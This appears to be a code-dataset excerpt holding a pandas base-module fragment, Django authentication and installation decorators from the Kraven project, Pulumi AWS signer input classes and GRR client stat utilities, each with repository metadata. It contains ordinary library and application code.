ascending: bool = False,
bins=None,
dropna: bool = True,
):
return value_counts(
self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
from pandas import Index
return Index(self).is_monotonic_decreasing
def _memory_usage(self, deep: bool = False) -> int:
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
raise AbstractMethodError(self)
| true
| true
|
790dabad8750b692755b533b3315b84491588b56
| 3,339
|
py
|
Python
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 3
|
2018-07-22T22:36:09.000Z
|
2019-05-31T10:29:54.000Z
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 41
|
2018-07-22T22:07:52.000Z
|
2018-11-14T11:07:48.000Z
|
app/modules/core/decorators.py
|
Clivern/Kraven
|
5d8d2de26e170d853d7d5f2b1f2d453ab07e4401
|
[
"Apache-2.0"
] | 1
|
2020-04-24T12:55:27.000Z
|
2020-04-24T12:55:27.000Z
|
"""
Custom Decorators
"""
# Django
from django.shortcuts import redirect, reverse
from django.http import JsonResponse
from django.utils.translation import gettext as _
from django.http import Http404
# local Django
from app.modules.util.helpers import Helpers
from app.modules.core.response import Response
from app.modules.entity.option_entity import Option_Entity
def redirect_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
if "redirect" in request.GET:
return redirect(request.GET["redirect"])
return redirect("app.web.admin.dashboard")
return function(controller, request, *args, **kwargs)
return wrap
def login_if_not_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated:
return redirect(reverse("app.web.login") + "?redirect=" + request.get_full_path())
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Access forbidden for authenticated users.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def redirect_if_not_installed(function):
def wrap(controller, request, *args, **kwargs):
        installed = Option_Entity().get_one_by_key("app_installed") is not False
if not installed:
return redirect("app.web.install")
return function(controller, request, *args, **kwargs)
return wrap
def protect_metric_with_auth_key(function):
def wrap(controller, request, *args, **kwargs):
if kwargs["type"] == "prometheus":
prometheus_token = Option_Entity().get_one_by_key("prometheus_token")
if prometheus_token.value != "" and ("HTTP_AUTHORIZATION" not in request.META or prometheus_token.value != request.META["HTTP_AUTHORIZATION"]):
raise Http404("Host not found.")
return function(controller, request, *args, **kwargs)
return wrap
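# Note (sketch, not part of this module): when the "prometheus_token" option is
# non-empty, scrapers must send it verbatim in the Authorization header, e.g.
#   curl -H "Authorization: <token>" https://example.com/metrics/prometheus
# (the URL is hypothetical); otherwise the endpoint raises Http404.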
def stop_request_if_installed(function):
def wrap(controller, request, *args, **kwargs):
        installed = Option_Entity().get_one_by_key("app_installed") is not False
if installed:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Application is already installed.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def log_request_data(function):
def wrap(controller, request, *args, **kwargs):
_helper = Helpers()
_logger = _helper.get_logger(__name__)
_logger.debug(_("Request Method: %s") % request.method)
_logger.debug(_("Request URL: %s") % request.path)
_logger.debug(_("Request Body: %s") % request.body)
return function(controller, request, *args, **kwargs)
return wrap
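# Minimal usage sketch (hypothetical controller class, not part of this
# module). Each decorator wraps a method whose signature is
# (controller, request, *args, **kwargs), so they compose on view methods.
class _ExampleController:

    @log_request_data
    @login_if_not_authenticated
    def get(self, request):
        # Reached only for authenticated users; anonymous requests are
        # redirected to the login page with a "redirect" query parameter.
        return "dashboard"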
| 37.943182
| 155
| 0.668763
|
from django.shortcuts import redirect, reverse
from django.http import JsonResponse
from django.utils.translation import gettext as _
from django.http import Http404
from app.modules.util.helpers import Helpers
from app.modules.core.response import Response
from app.modules.entity.option_entity import Option_Entity
def redirect_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
if "redirect" in request.GET:
return redirect(request.GET["redirect"])
return redirect("app.web.admin.dashboard")
return function(controller, request, *args, **kwargs)
return wrap
def login_if_not_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if not request.user or not request.user.is_authenticated:
return redirect(reverse("app.web.login") + "?redirect=" + request.get_full_path())
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_authenticated(function):
def wrap(controller, request, *args, **kwargs):
if request.user and request.user.is_authenticated:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Access forbidden for authenticated users.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def redirect_if_not_installed(function):
def wrap(controller, request, *args, **kwargs):
        installed = Option_Entity().get_one_by_key("app_installed") is not False
if not installed:
return redirect("app.web.install")
return function(controller, request, *args, **kwargs)
return wrap
def protect_metric_with_auth_key(function):
def wrap(controller, request, *args, **kwargs):
if kwargs["type"] == "prometheus":
prometheus_token = Option_Entity().get_one_by_key("prometheus_token")
if prometheus_token.value != "" and ("HTTP_AUTHORIZATION" not in request.META or prometheus_token.value != request.META["HTTP_AUTHORIZATION"]):
raise Http404("Host not found.")
return function(controller, request, *args, **kwargs)
return wrap
def stop_request_if_installed(function):
def wrap(controller, request, *args, **kwargs):
        installed = Option_Entity().get_one_by_key("app_installed") is not False
if installed:
response = Response()
return JsonResponse(response.send_private_failure([{
"type": "error",
"message": _("Error! Application is already installed.")
}]))
return function(controller, request, *args, **kwargs)
return wrap
def log_request_data(function):
def wrap(controller, request, *args, **kwargs):
_helper = Helpers()
_logger = _helper.get_logger(__name__)
_logger.debug(_("Request Method: %s") % request.method)
_logger.debug(_("Request URL: %s") % request.path)
_logger.debug(_("Request Body: %s") % request.body)
return function(controller, request, *args, **kwargs)
return wrap
| true
| true
|
790dacbafc49042cca1ce842ab68f6c32c98f502
| 10,765
|
py
|
Python
|
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/signer/_inputs.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SigningJobDestinationArgs',
'SigningJobDestinationS3Args',
'SigningJobRevocationRecordArgs',
'SigningJobSignedObjectArgs',
'SigningJobSignedObjectS3Args',
'SigningJobSourceArgs',
'SigningJobSourceS3Args',
'SigningProfileRevocationRecordArgs',
'SigningProfileSignatureValidityPeriodArgs',
]
@pulumi.input_type
class SigningJobDestinationArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobDestinationS3Args']):
"""
:param pulumi.Input['SigningJobDestinationS3Args'] s3: A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobDestinationS3Args']:
"""
A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobDestinationS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
prefix: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] prefix: An Amazon S3 object key prefix that you can use to limit signed objects keys to begin with the specified prefix.
"""
pulumi.set(__self__, "bucket", bucket)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def prefix(self) -> Optional[pulumi.Input[str]]:
"""
An Amazon S3 object key prefix that you can use to limit signed objects keys to begin with the specified prefix.
"""
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix", value)
@pulumi.input_type
class SigningJobRevocationRecordArgs:
def __init__(__self__, *,
reason: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if reason is not None:
pulumi.set(__self__, "reason", reason)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningJobSignedObjectArgs:
def __init__(__self__, *,
s3s: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]] = None):
"""
        :param pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]] s3s: A configuration block describing the S3 Signed Object: See S3 Signed Object below for details.
"""
if s3s is not None:
pulumi.set(__self__, "s3s", s3s)
@property
@pulumi.getter
def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]:
"""
        A configuration block describing the S3 Signed Object: See S3 Signed Object below for details.
"""
return pulumi.get(self, "s3s")
@s3s.setter
def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]):
pulumi.set(self, "s3s", value)
@pulumi.input_type
class SigningJobSignedObjectS3Args:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] key: Key name of the object that contains your unsigned code.
"""
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Key name of the object that contains your unsigned code.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@pulumi.input_type
class SigningJobSourceArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobSourceS3Args']):
"""
        :param pulumi.Input['SigningJobSourceS3Args'] s3: A configuration block describing the S3 Source object: See S3 Source below for details.
"""
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobSourceS3Args']:
"""
        A configuration block describing the S3 Source object: See S3 Source below for details.
"""
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobSourceS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
version: pulumi.Input[str]):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] key: Key name of the object that contains your unsigned code.
:param pulumi.Input[str] version: Version of your source image in your version enabled S3 bucket.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
Key name of the object that contains your unsigned code.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Version of your source image in your version enabled S3 bucket.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@pulumi.input_type
class SigningProfileRevocationRecordArgs:
def __init__(__self__, *,
revocation_effective_from: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if revocation_effective_from is not None:
pulumi.set(__self__, "revocation_effective_from", revocation_effective_from)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter(name="revocationEffectiveFrom")
def revocation_effective_from(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revocation_effective_from")
@revocation_effective_from.setter
def revocation_effective_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revocation_effective_from", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningProfileSignatureValidityPeriodArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[int]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[int]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[int]):
pulumi.set(self, "value", value)
| 32.820122
| 186
| 0.636693
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SigningJobDestinationArgs',
'SigningJobDestinationS3Args',
'SigningJobRevocationRecordArgs',
'SigningJobSignedObjectArgs',
'SigningJobSignedObjectS3Args',
'SigningJobSourceArgs',
'SigningJobSourceS3Args',
'SigningProfileRevocationRecordArgs',
'SigningProfileSignatureValidityPeriodArgs',
]
@pulumi.input_type
class SigningJobDestinationArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobDestinationS3Args']:
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobDestinationS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
prefix: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "bucket", bucket)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix", value)
@pulumi.input_type
class SigningJobRevocationRecordArgs:
def __init__(__self__, *,
reason: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if reason is not None:
pulumi.set(__self__, "reason", reason)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningJobSignedObjectArgs:
def __init__(__self__, *,
s3s: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]] = None):
if s3s is not None:
pulumi.set(__self__, "s3s", s3s)
@property
@pulumi.getter
def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]:
return pulumi.get(self, "s3s")
@s3s.setter
def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]):
pulumi.set(self, "s3s", value)
@pulumi.input_type
class SigningJobSignedObjectS3Args:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None):
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@pulumi.input_type
class SigningJobSourceArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobSourceS3Args']:
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobSourceS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
version: pulumi.Input[str]):
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@pulumi.input_type
class SigningProfileRevocationRecordArgs:
def __init__(__self__, *,
revocation_effective_from: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if revocation_effective_from is not None:
pulumi.set(__self__, "revocation_effective_from", revocation_effective_from)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter(name="revocationEffectiveFrom")
def revocation_effective_from(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revocation_effective_from")
@revocation_effective_from.setter
def revocation_effective_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revocation_effective_from", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningProfileSignatureValidityPeriodArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[int]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[int]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[int]):
pulumi.set(self, "value", value)
| true
| true
|
790dad6bf0d7a8a279a293c04eee935f54123d69
| 3,344
|
py
|
Python
|
grr/client/grr_response_client/client_utils.py
|
billstackpole/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | 1
|
2019-03-28T07:09:41.000Z
|
2019-03-28T07:09:41.000Z
|
grr/client/grr_response_client/client_utils.py
|
gingogo/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | null | null | null |
grr/client/grr_response_client/client_utils.py
|
gingogo/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | 1
|
2018-08-30T14:50:24.000Z
|
2018-08-30T14:50:24.000Z
|
#!/usr/bin/env python
"""Client utilities."""
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# pylint: disable=g-import-not-at-top
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
# pylint: enable=g-import-not-at-top
# pylint: disable=g-bad-name
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
# pylint: enable=g-bad-name
def StatEntryFromPath(path, pathspec, ext_attrs=True):
"""Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
"""Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
# TODO(hanuszczak): Why are we doing this?
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
# TODO(hanuszczak): Can we somehow incorporate extended attribute getter to
# the `Stat` class? That would make the code a lot prettier but would force
# `utils` to depend on `xattrs`.
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
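# Illustrative note (sketch, not part of GRR): the `value &= 0xFFFFFFFF` mask in
# StatEntryFromStat folds negative stat fields into their unsigned 32-bit form,
# e.g. -2 & 0xFFFFFFFF == 4294967294.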
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
